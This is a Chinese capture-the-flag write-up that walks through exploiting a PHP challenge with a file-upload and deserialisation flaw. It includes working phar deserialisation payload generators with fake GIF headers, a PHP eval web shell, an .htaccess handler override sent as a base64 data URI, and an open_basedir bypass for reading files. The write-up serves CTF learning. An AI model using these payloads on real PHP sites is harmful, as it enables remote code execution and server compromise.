这题打起来麻烦的一批,开了七八九十十一二个靶机才打通,确实给👴打吐了
打开给了源码
<?php
class dir{
public $userdir;
public $url;
public $filename;
public function __construct($url,$filename) {
$this->userdir = "upload/" . md5($_SERVER["REMOTE_ADDR"]);
$this->url = $url;
$this->filename = $filename;
if (!file_exists($this->userdir)) {
mkdir($this->userdir, 0777, true);
}
}
public function checkdir(){
if ($this->userdir != "upload/" . md5($_SERVER["REMOTE_ADDR"])) {
die('hacker!!!');
}
}
public function checkurl(){
$r = parse_url($this->url);
if (!isset($r['scheme']) || preg_match("/file|php/i",$r['scheme'])){
die('hacker!!!');
}
}
public function checkext(){
if (stristr($this->filename,'..')){
die('hacker!!!');
}
if (stristr($this->filename,'/')){
die('hacker!!!');
}
$ext = substr($this->filename, strrpos($this->filename, ".") + 1);
if (preg_match("/ph/i", $ext)){
die('hacker!!!');
}
}
public function upload(){
$this->checkdir();
$this->checkurl();
$this->checkext();
$content = file_get_contents($this->url,NULL,NULL,0,2048);
if (preg_match("/\<\?|value|on|type|flag|auto|set|\\\\/i", $content)){ die('hacker!!!'); } file_put_contents($this->userdir."/".$this->filename,$content);
}
public function remove(){
$this->checkdir();
$this->checkext();
if (file_exists($this->userdir."/".$this->filename)){
unlink($this->userdir."/".$this->filename);
}
}
public function count($dir) {
if ($dir === ''){
$num = count(scandir($this->userdir)) - 2;
}
else {
$num = count(scandir($dir)) - 2;
}
if($num > 0) {
return "you have $num files";
}
else{
return "you don't have file";
}
}
public function __toString() {
return implode(" ",scandir(__DIR__."/".$this->userdir));
}
public function __destruct() {
$string = "your file in : ".$this->userdir;
file_put_contents($this->filename.".txt", $string);
echo $string;
}
}
if (!isset($_POST['action']) || !isset($_POST['url']) || !isset($_POST['filename'])){
highlight_file(__FILE__);
die();
}
$dir = new dir($_POST['url'],$_POST['filename']);
if($_POST['action'] === "upload") {
$dir->upload();
}
elseif ($_POST['action'] === "remove") {
$dir->remove();
}
elseif ($_POST['action'] === "count") {
if (!isset($_POST['dir'])){
echo $dir->count('');
} else {
echo $dir->count($_POST['dir']);
}
}
有文件上传点,有反序列化,没过滤phar。phar反序列化
$this->checkext()
过滤了php后缀,能上传.htaccess文件,但是会检测文件内容
我们开始了解的知识可以知道.htaccess文件一般的形式都是
<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>
或者
AddType application/x-httpd-php .txt
很明显不太能绕过去,查了下资料,还可以这样解析
AddHandler php7-script .txt
所以思路比较明显了,我们上传一个txt文件解析php就行
这里给了_toSrting()方法,扫了目录,暂时不知道有啥用u1s1,下面会拼接txt。
试了一会儿,发现直接上传触发生成不了文件,所以需要用到scandir函数了。我们需要知道绝对路径,才能正确写入文件
<?php
class dir{
public $userdir;
public $url;
public $filename;
}
$d = new dir();
$d->userdir = new dir();
$d->userdir->userdir = "../";
$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89A"."__HALT_COMPILER();"); //设置stub,增加gif文件头用以欺骗检测
$phar->setMetadata($d); //将自定义meta-data存入manifest
$phar->addFromString("test.jpg", "test"); //添加要压缩的文件
$phar->stopBuffering();
所以得到绝对路径(这里可以不用gzip
然后写入txt文件并触发phar
<?php
class dir{
public $userdir;
public $url;
public $filename;
}
$a = new dir("url", "filename");
$a->filename = '/var/www/html/8b5c8441a8ff8e15/upload/adeee0c170ad4ffb110df0cde294aecd/webshell';
$a->userdir = '<?php eval($_POST[1]); phpinfo();';
$phar = new Phar("2.phar");
$phar->startBuffering();
$phar->setStub("GIF89A"."__HALT_COMPILER();"); //设置stub,增加gif文件头用以欺骗检测
$phar->setMetadata($a); //将自定义meta-data存入manifest
$phar->addFromString("test.jpg", "test"); //添加要压缩的文件
$phar->stopBuffering();
发现写入不了,老是hacker我。看了下wp发现用gzip压缩下就好了,然后发现触发了phar后写不进去文件。。重试亿次
成功写入,然后写入htaccess
data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0将base64编码的:.htaccess写入
再试亿次,重开亿次靶机,
蚁剑连接,有disablefunction,绕一下
或者 ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(scandir('/'));
ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(show_source('/F1aG_1s_H4r4'));
拿到flag
看到官方wp用的是glob+爆破路径,没复现
https://www.anquanke.com/post/id/193939#h3-7